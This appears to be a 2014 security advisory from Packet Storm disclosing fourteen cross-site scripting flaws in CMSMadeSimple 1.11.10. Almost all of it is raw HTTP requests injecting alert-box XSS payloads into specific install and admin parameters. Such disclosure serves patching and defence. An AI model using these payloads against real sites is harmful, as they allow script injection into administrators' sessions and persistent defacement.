CMSMadeSimple version 1.11.10 suffers from fourteen cross site scripting vulnerabilities.
a5774bb267898276c4969bdf9b9b4b4526766ff535c3954c1cd6596f037ea7fa# ==============================================================
# Title ...| CMSMadeSimple Multiple vulnerabilities
# Version .| cmsmadesimple-1.11.10-full.tar.gz
# Date ....| 20.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.cmsmadesimple.org
# ==============================================================
# ==============================================================
# 1. XSS in install
---<request>---
POST /k/cms/cmsmadesimple/install/index.php?sessiontest=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 72
default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&submit=Submit
---<request>---
# ==============================================================
# 2. docroot parameter persistent XSS and config edit vulnerability
---<request>---
POST /k/cms/cmsmadesimple/install/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 415
docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US
---<request>---
---<response>---
<p>Updating hierarchy positions... [done]</p><p>Setting up core events... [done]</p><p>Installing modules... [done]</p><p>Clearing site cache (if any)... [done]</p>
<div class="success">
Congratulations, you are all setup - here is your <a href="$("<img/src='x'/onerror=alert(9999)>")">CMS Site</a>
</div>
<div class="continue">
<form action="$("<img/src='x'/onerror=alert(9999)>")/admin/login.php" method="post" name="page7form" id="page7form">
<input type="submit" value="go to the Admin Panel" />
---<response>---
# ==============================================================
# 3. XSS over GET (from admin user):
http://10.149.14.62/cmsmadesimple/lib/filemanager/ImageManager/editorFrame.php?img=%2Flogo1.gif&action=%22;alert%28123%29;//
# ==============================================================
# 4. XSS
---<request>---
POST /k/cms/cmsmadesimple/admin/addhtmlblob.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 199
_sx_=50f02dc0609d19b4&htmlblob='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&use_wysiwyg=0&use_wysiwyg=1&content=aaaaaa&description=aaaaaaaaaaa&additional_editors%5B%5D=-2&addhtmlblob=true&submit2=Submit
---<request>---
Also vulnerable: description
# ==============================================================
# 5. XSS
---<request>---
POST /k/cms/cmsmadesimple/admin/addtemplate.php?_sx_=50f02dc0609d19b4 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1068
template=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&content=(...)=on&addtemplate=true&submit=Submit
---<request>---
Also vulnerable: content
# ==============================================================
# 6. XSS
---<request>---
POST /k/cms/cmsmadesimple/admin/addcss.php?_sx_=50f02dc0609d19b4 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 107
css_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&css_text=zzzzzzzzzzzzzz&media_query=zzzzzzzz&addcss=true
---<request>---
# ==============================================================
# 7. XSS
---<request>---
POST /k/cms/cmsmadesimple/admin/siteprefs.php?_sx_=50f02dc0609d19b4 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 299
_sx_=50f02dc0609d19b4&active_tab=general&editsiteprefs=true&sitename=CMS+Made+Simple+Site&frontendlang=&frontendwysiwyg=-1&nogcbwysiwyg=0&metadata='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&logintheme=OneEleven&backendwysiwyg=-1&defaultdateformat=&thumbnail_width=96&thumbnail_height=96&submit=Submit
---<request>---
Also vulnerable: defaultdateformat
# ==============================================================
# 8. XSS
---<request>---
POST /k/cms/cmsmadesimple/admin/pagedefaults.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 376
editpagedefaults=true&_sx_=50f02dc0609d19b4&default_contenttype=content&page_active=on&page_showinmenu=on&page_cachable=on&page_metadata='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&page_defaultcontent=%3C%21--+Add+code+here+that+should+appear+in+the+content+block+of+all+new+pages+--%3E&page_searchable=on&additional_editors=&page_extra1=&page_extra2=&page_extra3=&submit=Submit
---<request>---
Also vulnerable: page_defaultcontent
# ==============================================================
# 9. Persistent xss
---<request>---
POST /k/cms/cmsmadesimple/admin/addbookmark.php?_sx_=cb49601060b8ec40 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 101
_sx_=cb49601060b8ec40&title='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&url=asdasd.com&addbookmark=true
---<request>---
Also vulnerable: url parameter
# ==============================================================
# 10. XSS
---<request>---
POST /k/cms/cmsmadesimple/admin/siteprefs.php?_sx_=cb49601060b8ec40 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 341
_sx_=cb49601060b8ec40&active_tab=sitedown&editsiteprefs=true&enablesitedownmessage=0&use_wysiwyg=0&use_wysiwyg=1&sitedownmessage=%3Cp%3ESite+is+currently+down+for+maintenance.%3Cimg+src%3D%22zzzzzzz.com%22+alt%3D%22asdasdasd%22+%2F%3E%3C%2Fp%3E&sitedownexcludeadmins=0&sitedownexcludes='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&submit=Submit
---<request>---
# ==============================================================
# 11. XSS
---<request>---
POST /k/cms/cmsmadesimple/admin/myaccount.php?_sx_=cb49601060b8ec40 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 441
active_tab=advtab&edituserprefs=true&old_default_cms_lang=en_US&default_cms_language=en_US&date_format_string='%3e"%3e%3cbody%2fonload%3dalert(123123)%3e&wysiwyg=MicroTiny&syntaxhighlighter=-1&gcb_wysiwyg=on&indent=on&admintheme=OneEleven&homepage=&bookmarks=on&parent_id=-1&listtemplates_pagelimit=20&liststylesheets_pagelimit=20&listgcbs_pagelimit=20&enablenotifications=on&edituserprefs=true&old_default_cms_lang=en_US&submit_prefs=Submit
---<request>---
Also vulnerable: old_default_cms_lang
# ==============================================================
# 12. XSS
---<request>---
POST /k/cms/cmsmadesimple/admin/adminlog.php?_sx_=cb49601060b8ec40 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 97
filteruser='%3e"%3e%3cbody%2fonload%3dalert(123123)%3e&filteraction=asd&filterapply=Apply+filters
---<request>---
Also vulnerable: filteraction
# ==============================================================
# 13. XSS
---<request>---
POST /k/cms/cmsmadesimple/admin/pagedefaults.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 378
editpagedefaults=true&_sx_=cb49601060b8ec40&default_contenttype=content&page_active=on&page_showinmenu=on&page_cachable=on&page_metadata='%3e"%3e%3cbody%2fonload%3dalert(123123)%3e&page_defaultcontent=%3C%21--+Add+code+here+that+should+appear+in+the+content+block+of+all+new+pages+--%3E&page_searchable=on&additional_editors=&page_extra1=&page_extra2=&page_extra3=&submit=Submit
---<request>---
Also vulnerable: page_defaultcontent, page_extra1
# ==============================================================
# 14. XSS
---<request>---
POST /k/cms/cmsmadesimple/admin/editevent.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 132
_sx_=cb49601060b8ec40&action=create&handler='%3e"%3e%3cbody%2fonload%3dalert(123123)%3e&module=News&event=NewsCategoryEdited&add=Add
---<request>---
Also vulnerable: event, add
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed